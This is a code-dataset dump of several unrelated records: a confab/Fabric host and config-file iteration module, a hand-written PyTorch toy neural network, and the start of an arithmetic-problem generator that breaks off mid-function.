assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-4": "<mask token>\nfrom contextlib import contextmanager\nfrom fabric.api import env, settings, abort\nfrom os.path import join\nfrom pkg_resources import iter_entry_points\nfrom warnings import warn\nfrom fabric.network import ssh_config\nfrom confab.options import options\nfrom confab.validate import assert_exists\nfrom confab.loaders import FileSystemEnvironmentLoader\nfrom confab.data import DataLoader\nfrom confab.conffiles import ConfFiles\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n host_string = hostname\n port = host_config.get('port', env.default_port)\n with settings(host_string=host_string, port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort('Environment needs to be configured')\n environmentdef = env.environmentdef\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host in environmentdef.hosts():\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n for host_and_role in environmentdef.all():\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()),\n directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n return ConfFiles(host_and_role, FileSystemEnvironmentLoader(*\n templates_dirs), DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group='confab.extensions'):\n try:\n path_func = entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-5": "\"\"\"\nIterations over :term:`hosts<host>`, :term:`roles<role>`,\n:term:`components<component>` and config files.\n\"\"\"\nfrom contextlib import contextmanager\nfrom fabric.api import env, settings, abort\nfrom os.path import join\nfrom pkg_resources import iter_entry_points\nfrom warnings import warn\n\nfrom fabric.network import ssh_config\n\nfrom confab.options import options\nfrom confab.validate import assert_exists\nfrom confab.loaders import FileSystemEnvironmentLoader\nfrom confab.data import DataLoader\nfrom confab.conffiles import ConfFiles\n\n\n@contextmanager\ndef this_hostname(hostname):\n \"\"\"\n Context manager that uses the current SSH confg to switch Fabric to a specific hostname.\n\n Updates hostname and port.\n \"\"\"\n host_config = ssh_config(hostname)\n\n host_string = hostname\n port = host_config.get(\"port\", env.default_port)\n\n with settings(host_string=host_string,\n port=port):\n yield\n\n\ndef _get_environmentdef():\n \"\"\"\n Retreive the EnvironmentDefinition from the fabric env.\n \"\"\"\n if 'environmentdef' not in env:\n abort(\"Environment needs to be configured\")\n\n environmentdef = env.environmentdef\n\n # If we're running via `fab`, we should restrict the environment\n # to the current host.\n if env.host_string:\n environmentdef = environmentdef.with_hosts(env.host_string)\n\n return environmentdef\n\n\ndef iter_hosts():\n \"\"\"\n Iterate over all hosts in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n\n for host in environmentdef.hosts():\n # fabric needs the host if we're calling from main()\n with this_hostname(host.host):\n yield host\n\n\ndef iter_hosts_and_roles():\n \"\"\"\n Iterate over all hosts and roles in the configured environment.\n \"\"\"\n environmentdef = _get_environmentdef()\n\n for host_and_role in environmentdef.all():\n # fabric needs the host if we're calling from main()\n with this_hostname(host_and_role.host):\n yield host_and_role\n\n\ndef iter_conffiles(directory=None):\n \"\"\"\n Generate :class:`~confab.conffiles.ConfFiles` objects for each\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n for host_and_role in iter_hosts_and_roles():\n yield make_conffiles(host_and_role, directory)\n\n\ndef make_conffiles(host_and_role, directory=None):\n \"\"\"\n Create a :class:`~confab.conffiles.ConfFiles` object for a\n ``host_and_role`` in an :term:`environment`.\n\n Uses the default :class:`~confab.loaders.FileSystemEnvironmentLoader` and\n :class:`~confab.data.DataLoader`.\n\n :param directory: Path to templates and data directories.\n \"\"\"\n directories = [directory or options.get_base_dir()]\n directories.extend(iter_extension_paths())\n\n # Construct directories\n templates_dirs = map(lambda dir: join(dir, options.get_templates_dir()), directories)\n assert_exists(*templates_dirs)\n data_dirs = map(lambda dir: join(dir, options.get_data_dir()), directories)\n assert_exists(*data_dirs)\n\n return ConfFiles(host_and_role,\n FileSystemEnvironmentLoader(*templates_dirs),\n DataLoader(data_dirs))\n\n\ndef iter_extension_paths():\n \"\"\"\n Get templates paths from confab extension entry points.\n\n entry points should point to a callable that returns the base path\n to the data and templates directories.\n \"\"\"\n for entry_point in iter_entry_points(group=\"confab.extensions\"):\n try:\n path_func = 
entry_point.load()\n yield path_func()\n except ImportError as e:\n warn(str(e))\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
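The this_hostname helper in the record above is the standard contextlib save-override-restore pattern, delegated to Fabric's settings(). A generic sketch of the same pattern with a plain dict standing in for Fabric's env (illustrative, not confab's or Fabric's API):

from contextlib import contextmanager

env = {'host_string': None, 'port': 22}

@contextmanager
def temporary_settings(**overrides):
    saved = {k: env[k] for k in overrides}
    env.update(overrides)
    try:
        yield
    finally:
        env.update(saved)  # restore on exit, even if the block raises

with temporary_settings(host_string='web01', port=2222):
    print(env['host_string'], env['port'])  # web01 2222
print(env['host_string'], env['port'])      # None 22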
<|reserved_special_token_0|>
class Neural_Network(nn.Module):
<|reserved_special_token_0|>
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.W1 = torch.randn(self.input_size, self.hidden_size)
self.W2 = torch.randn(self.hidden_size, self.output_size)
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1)
self.z2 = self.sigmoid(self.z)
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3)
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o
self.o_delta = self.o_error * self.sigmoid_prime(o)
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
torch.save(model, 'NN')
def predict(self):
"""predict"""
print('Predicted data based on trained weights: ')
print('Input (scaled): \n' + str(xPredicted))
print('Output: \n' + str(self.forward(xPredicted)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Neural_Network(nn.Module):
"""Neural network class"""
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.W1 = torch.randn(self.input_size, self.hidden_size)
self.W2 = torch.randn(self.hidden_size, self.output_size)
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1)
self.z2 = self.sigmoid(self.z)
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3)
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o
self.o_delta = self.o_error * self.sigmoid_prime(o)
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
torch.save(model, 'NN')
def predict(self):
"""predict"""
print('Predicted data based on trained weights: ')
print('Input (scaled): \n' + str(xPredicted))
print('Output: \n' + str(self.forward(xPredicted)))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
X = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float)
y = torch.tensor(([92], [100], [89]), dtype=torch.float)
xPredicted = torch.tensor([4, 8], dtype=torch.float)
breakpoint()
X_max, index1 = torch.max(X, 0)
xPredicted_max, index2 = torch.max(xPredicted, 0)
X = torch.div(X, X_max)
xPredicted = torch.div(xPredicted, xPredicted_max)
y = y / 100
print('X_max:', X_max)
print('xPredicted_max:', xPredicted_max)
print('X:', X)
print('y:', y)
print('xPredicted:', xPredicted)
class Neural_Network(nn.Module):
"""Neural network class"""
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.W1 = torch.randn(self.input_size, self.hidden_size)
self.W2 = torch.randn(self.hidden_size, self.output_size)
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1)
self.z2 = self.sigmoid(self.z)
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3)
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o
self.o_delta = self.o_error * self.sigmoid_prime(o)
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
torch.save(model, 'NN')
def predict(self):
"""predict"""
print('Predicted data based on trained weights: ')
print('Input (scaled): \n' + str(xPredicted))
print('Output: \n' + str(self.forward(xPredicted)))
NN = Neural_Network()
epoch = 1000
for i in range(epoch):
NN.train(X, y)
NN.save_weights(NN)
NN.predict()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import torch
import torch.nn as nn
X = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float)
y = torch.tensor(([92], [100], [89]), dtype=torch.float)
xPredicted = torch.tensor([4, 8], dtype=torch.float)
breakpoint()
X_max, index1 = torch.max(X, 0)
xPredicted_max, index2 = torch.max(xPredicted, 0)
X = torch.div(X, X_max)
xPredicted = torch.div(xPredicted, xPredicted_max)
y = y / 100
print('X_max:', X_max)
print('xPredicted_max:', xPredicted_max)
print('X:', X)
print('y:', y)
print('xPredicted:', xPredicted)
class Neural_Network(nn.Module):
"""Neural network class"""
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
self.W1 = torch.randn(self.input_size, self.hidden_size)
self.W2 = torch.randn(self.hidden_size, self.output_size)
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1)
self.z2 = self.sigmoid(self.z)
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3)
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o
self.o_delta = self.o_error * self.sigmoid_prime(o)
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
torch.save(model, 'NN')
def predict(self):
"""predict"""
print('Predicted data based on trained weights: ')
print('Input (scaled): \n' + str(xPredicted))
print('Output: \n' + str(self.forward(xPredicted)))
NN = Neural_Network()
epoch = 1000
for i in range(epoch):
NN.train(X, y)
NN.save_weights(NN)
NN.predict()
<|reserved_special_token_1|>
"""
Simple neural network using pytorch
"""
import torch
import torch.nn as nn
# Prepare the data
# X represents the amount of hours studied and how much time students spent sleeping
X = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float) # 3 X 2 tensor
# y represent grades.
y = torch.tensor(([92], [100], [89]), dtype=torch.float) # 3 X 1 tensor
# xPredicted is a single input for which we want to predict a grade using
# the parameters learned by the neural network.
xPredicted = torch.tensor(([4, 8]), dtype=torch.float) # 1 X 2 tensor
# Scale units
breakpoint()
X_max, index1 = torch.max(X, 0)
xPredicted_max, index2 = torch.max(xPredicted, 0)
X = torch.div(X, X_max)
xPredicted = torch.div(xPredicted, xPredicted_max)
y = y / 100 # max test score is 100
print("X_max:", X_max)
print("xPredicted_max:", xPredicted_max)
print("X:", X)
print("y:", y)
print("xPredicted:", xPredicted)
class Neural_Network(nn.Module):
"""Neural network class"""
def __init__(self, input_size=2, output_size=1, hidden_size=3):
super(Neural_Network, self).__init__()
# parameters
self.input_size = input_size
self.output_size = output_size
self.hidden_size = hidden_size
# weights
self.W1 = torch.randn(self.input_size, self.hidden_size) # 3 X 2 tensor
self.W2 = torch.randn(self.hidden_size, self.output_size) # 3 X 1 tensor
def forward(self, X):
"""forward calculation"""
self.z = torch.matmul(X, self.W1) # 3 X 3 ".dot" does not broadcast in PyTorch
self.z2 = self.sigmoid(self.z) # activation function
self.z3 = torch.matmul(self.z2, self.W2)
o = self.sigmoid(self.z3) # final activation function
return o
def backward(self, X, y, o):
"""backward calculation"""
self.o_error = y - o # error in output
self.o_delta = self.o_error * self.sigmoid_prime(o) # derivative of sig to error
self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))
self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)
self.W1 += torch.matmul(torch.t(X), self.z2_delta)
self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)
def sigmoid(self, s):
"""calculate sigmoid"""
return 1 / (1 + torch.exp(-s))
def sigmoid_prime(self, s):
"""calculate derivative of sigmoid"""
return s * (1 - s)
def train(self, X, y):
# forward + backward pass for training
o = self.forward(X)
self.backward(X, y, o)
def save_weights(self, model):
# we will use the PyTorch internal storage functions
torch.save(model, "NN")
# you can reload model with all the weights and so forth with:
# torch.load("NN")
def predict(self):
"""predict"""
# @TODO: should be passed in as argument
print ("Predicted data based on trained weights: ")
print ("Input (scaled): \n" + str(xPredicted))
print ("Output: \n" + str(self.forward(xPredicted)))
NN = Neural_Network()
epoch = 1000
for i in range(epoch): # trains the NN epoch times
#print ("#" + str(i) + " Loss: " + str(torch.mean((y - NN(X))**2).detach().item())) # mean sum squared loss
NN.train(X, y)
NN.save_weights(NN)
NN.predict()
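# Editor's note: an illustrative reload check appended here, not part of the
# original snippet; save_weights() above pickles the whole module, so on
# PyTorch versions where torch.load unpickles full objects by default it can
# be restored like this:
loaded_nn = torch.load('NN')
print('Reloaded prediction: \n' + str(loaded_nn.forward(xPredicted)))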
|
flexible
|
{
"blob_id": "2d5e7c57f58f189e8d0c7d703c1672ea3586e4ac",
"index": 6771,
"step-1": "<mask token>\n\n\nclass Neural_Network(nn.Module):\n <mask token>\n\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.W1 = torch.randn(self.input_size, self.hidden_size)\n self.W2 = torch.randn(self.hidden_size, self.output_size)\n\n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1)\n self.z2 = self.sigmoid(self.z)\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3)\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o\n self.o_delta = self.o_error * self.sigmoid_prime(o)\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n\n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n\n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n\n def train(self, X, y):\n o = self.forward(X)\n self.backward(X, y, o)\n\n def save_weights(self, model):\n torch.save(model, 'NN')\n\n def predict(self):\n \"\"\"predict\"\"\"\n print('Predicted data based on trained weights: ')\n print('Input (scaled): \\n' + str(xPredicted))\n print('Output: \\n' + str(self.forward(xPredicted)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Neural_Network(nn.Module):\n \"\"\"Neural network class\"\"\"\n\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.W1 = torch.randn(self.input_size, self.hidden_size)\n self.W2 = torch.randn(self.hidden_size, self.output_size)\n\n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1)\n self.z2 = self.sigmoid(self.z)\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3)\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o\n self.o_delta = self.o_error * self.sigmoid_prime(o)\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n\n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n\n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n\n def train(self, X, y):\n o = self.forward(X)\n self.backward(X, y, o)\n\n def save_weights(self, model):\n torch.save(model, 'NN')\n\n def predict(self):\n \"\"\"predict\"\"\"\n print('Predicted data based on trained weights: ')\n print('Input (scaled): \\n' + str(xPredicted))\n print('Output: \\n' + str(self.forward(xPredicted)))\n\n\n<mask token>\n",
"step-3": "<mask token>\nX = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float)\ny = torch.tensor(([92], [100], [89]), dtype=torch.float)\nxPredicted = torch.tensor([4, 8], dtype=torch.float)\nbreakpoint()\nX_max, index1 = torch.max(X, 0)\nxPredicted_max, index2 = torch.max(xPredicted, 0)\nX = torch.div(X, X_max)\nxPredicted = torch.div(xPredicted, xPredicted_max)\ny = y / 100\nprint('X_max:', X_max)\nprint('xPredicted_max:', xPredicted_max)\nprint('X:', X)\nprint('y:', y)\nprint('xPredicted:', xPredicted)\n\n\nclass Neural_Network(nn.Module):\n \"\"\"Neural network class\"\"\"\n\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.W1 = torch.randn(self.input_size, self.hidden_size)\n self.W2 = torch.randn(self.hidden_size, self.output_size)\n\n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1)\n self.z2 = self.sigmoid(self.z)\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3)\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o\n self.o_delta = self.o_error * self.sigmoid_prime(o)\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n\n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n\n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n\n def train(self, X, y):\n o = self.forward(X)\n self.backward(X, y, o)\n\n def save_weights(self, model):\n torch.save(model, 'NN')\n\n def predict(self):\n \"\"\"predict\"\"\"\n print('Predicted data based on trained weights: ')\n print('Input (scaled): \\n' + str(xPredicted))\n print('Output: \\n' + str(self.forward(xPredicted)))\n\n\nNN = Neural_Network()\nepoch = 1000\nfor i in range(epoch):\n NN.train(X, y)\nNN.save_weights(NN)\nNN.predict()\n",
"step-4": "<mask token>\nimport torch\nimport torch.nn as nn\nX = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float)\ny = torch.tensor(([92], [100], [89]), dtype=torch.float)\nxPredicted = torch.tensor([4, 8], dtype=torch.float)\nbreakpoint()\nX_max, index1 = torch.max(X, 0)\nxPredicted_max, index2 = torch.max(xPredicted, 0)\nX = torch.div(X, X_max)\nxPredicted = torch.div(xPredicted, xPredicted_max)\ny = y / 100\nprint('X_max:', X_max)\nprint('xPredicted_max:', xPredicted_max)\nprint('X:', X)\nprint('y:', y)\nprint('xPredicted:', xPredicted)\n\n\nclass Neural_Network(nn.Module):\n \"\"\"Neural network class\"\"\"\n\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n self.W1 = torch.randn(self.input_size, self.hidden_size)\n self.W2 = torch.randn(self.hidden_size, self.output_size)\n\n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1)\n self.z2 = self.sigmoid(self.z)\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3)\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o\n self.o_delta = self.o_error * self.sigmoid_prime(o)\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n\n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n\n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n\n def train(self, X, y):\n o = self.forward(X)\n self.backward(X, y, o)\n\n def save_weights(self, model):\n torch.save(model, 'NN')\n\n def predict(self):\n \"\"\"predict\"\"\"\n print('Predicted data based on trained weights: ')\n print('Input (scaled): \\n' + str(xPredicted))\n print('Output: \\n' + str(self.forward(xPredicted)))\n\n\nNN = Neural_Network()\nepoch = 1000\nfor i in range(epoch):\n NN.train(X, y)\nNN.save_weights(NN)\nNN.predict()\n",
"step-5": "\"\"\"\nSimple neural network using pytorch\n\"\"\"\nimport torch\nimport torch.nn as nn\n\n# Prepare the data\n\n# X represents the amount of hours studied and how much time students spent sleeping\nX = torch.tensor(([2, 9], [1, 5], [3, 6]), dtype=torch.float) # 3 X 2 tensor\n# y represent grades. \ny = torch.tensor(([92], [100], [89]), dtype=torch.float) # 3 X 1 tensor\n# xPredicted is a single input for which we want to predict a grade using \n# the parameters learned by the neural network.\nxPredicted = torch.tensor(([4, 8]), dtype=torch.float) # 1 X 2 tensor\n\n# Scale units\nbreakpoint()\nX_max, index1 = torch.max(X, 0)\nxPredicted_max, index2 = torch.max(xPredicted, 0)\n\nX = torch.div(X, X_max)\nxPredicted = torch.div(xPredicted, xPredicted_max)\ny = y / 100 # max test score is 100\n\nprint(\"X_max:\", X_max)\nprint(\"xPredicted_max:\", xPredicted_max)\nprint(\"X:\", X)\nprint(\"y:\", y)\nprint(\"xPredicted:\", xPredicted)\n\nclass Neural_Network(nn.Module):\n \"\"\"Neural network class\"\"\"\n def __init__(self, input_size=2, output_size=1, hidden_size=3):\n super(Neural_Network, self).__init__()\n # parameters\n\n self.input_size = input_size\n self.output_size = output_size\n self.hidden_size = hidden_size\n \n # weights\n self.W1 = torch.randn(self.input_size, self.hidden_size) # 3 X 2 tensor\n self.W2 = torch.randn(self.hidden_size, self.output_size) # 3 X 1 tensor\n \n def forward(self, X):\n \"\"\"forward calculation\"\"\"\n self.z = torch.matmul(X, self.W1) # 3 X 3 \".dot\" does not broadcast in PyTorch\n self.z2 = self.sigmoid(self.z) # activation function\n self.z3 = torch.matmul(self.z2, self.W2)\n o = self.sigmoid(self.z3) # final activation function\n return o\n\n def backward(self, X, y, o):\n \"\"\"backward calculation\"\"\"\n self.o_error = y - o # error in output\n self.o_delta = self.o_error * self.sigmoid_prime(o) # derivative of sig to error\n self.z2_error = torch.matmul(self.o_delta, torch.t(self.W2))\n self.z2_delta = self.z2_error * self.sigmoid_prime(self.z2)\n self.W1 += torch.matmul(torch.t(X), self.z2_delta)\n self.W2 += torch.matmul(torch.t(self.z2), self.o_delta)\n \n def sigmoid(self, s):\n \"\"\"calculate sigmoid\"\"\"\n return 1 / (1 + torch.exp(-s))\n \n def sigmoid_prime(self, s):\n \"\"\"calculate derivative of sigmoid\"\"\"\n return s * (1 - s)\n \n def train(self, X, y):\n # forward + backward pass for training\n o = self.forward(X)\n self.backward(X, y, o)\n \n def save_weights(self, model):\n # we will use the PyTorch internal storage functions\n torch.save(model, \"NN\")\n # you can reload model with all the weights and so forth with:\n # torch.load(\"NN\")\n \n def predict(self):\n \"\"\"predict\"\"\"\n # @TODO: should be passed in as argument\n print (\"Predicted data based on trained weights: \")\n print (\"Input (scaled): \\n\" + str(xPredicted))\n print (\"Output: \\n\" + str(self.forward(xPredicted)))\n \n\nNN = Neural_Network()\nepoch = 1000\nfor i in range(epoch): # trains the NN epoch times\n #print (\"#\" + str(i) + \" Loss: \" + str(torch.mean((y - NN(X))**2).detach().item())) # mean sum squared loss\n NN.train(X, y)\nNN.save_weights(NN)\nNN.predict()",
"step-ids": [
9,
10,
12,
13,
14
]
}
|
[
9,
10,
12,
13,
14
] |
from random import randint, shuffle
class Generator:
opset = ['+', '-', '*', '/', '²', '√', 'sin', 'cos', 'tan']
@staticmethod
def generate(level):
"""
        Generate an arithmetic problem at the difficulty given by level.
        0: primary school; 1: junior high school; 2: senior high school
"""
"""
        Generate the operand sequence and the binary-operator sequence.
"""
length = randint(0 if level else 1, 4)
op2Arr = [Generator.opset[randint(0, 3)] for i in range(length)]
numArr = [randint(1, 100) for i in range(length + 1)]
"""
        Generate the positions of the binary operators.
"""
remain = 1
position = []
for i in range(length):
position.append(randint(0, remain))
remain += 1 - position[i]
if remain > 1:
position[-1] += remain - 1
"""
        Generate the unary-operator sequence.
"""
op1Arr = []
if level:
if level == 1:
op1Arr.append(Generator.opset[randint(4, 5)])
elif level == 2:
op1Arr.append(Generator.opset[randint(6, 8)])
for i in range(randint(0, level)):
op1Arr.append(Generator.opset[randint(4, 5 if level == 1 else
8)])
shuffle(op1Arr)
"""
        Generate the postfix expression.
"""
expression = numArr
offset = 2
index = 0
for i in range(length):
for j in range(position[i]):
expression.insert(i + j + offset, op2Arr[index])
index += 1
offset += position[i]
for op in op1Arr:
expression.insert(randint(1, len(expression)), op)
def getPriority(item):
"""
            Return the priority of an operator or operand:
            operand: 0
            unary operator: 1
            '*', '/': 2
            '+', '-': 3
"""
if isinstance(item, int):
return 0
elif item == '+' or item == '-':
return 3
elif item == '*' or item == '/':
return 2
else:
return 1
"""
        Convert the postfix expression to infix.
        The stack stores (expression, priority) pairs.
"""
stack = []
for e in expression:
priority = getPriority(e)
if priority == 0:
"""
                An operand: push it onto the stack directly.
"""
stack.append((e, 0))
elif priority == 3:
"""
                Add/subtract has the lowest priority: concatenate and push.
"""
item2 = stack.pop()[0]
item1 = stack.pop()[0]
stack.append(('%s%s%s' % (item1, e, item2), 3))
elif priority == 2:
"""
                Multiply/divide: parenthesize operands built from add/subtract.
"""
item2, prio2 = stack.pop()
if prio2 > 2:
item2 = '(%s)' % item2
item1, prio1 = stack.pop()
if prio1 > 2:
item1 = '(%s)' % item1
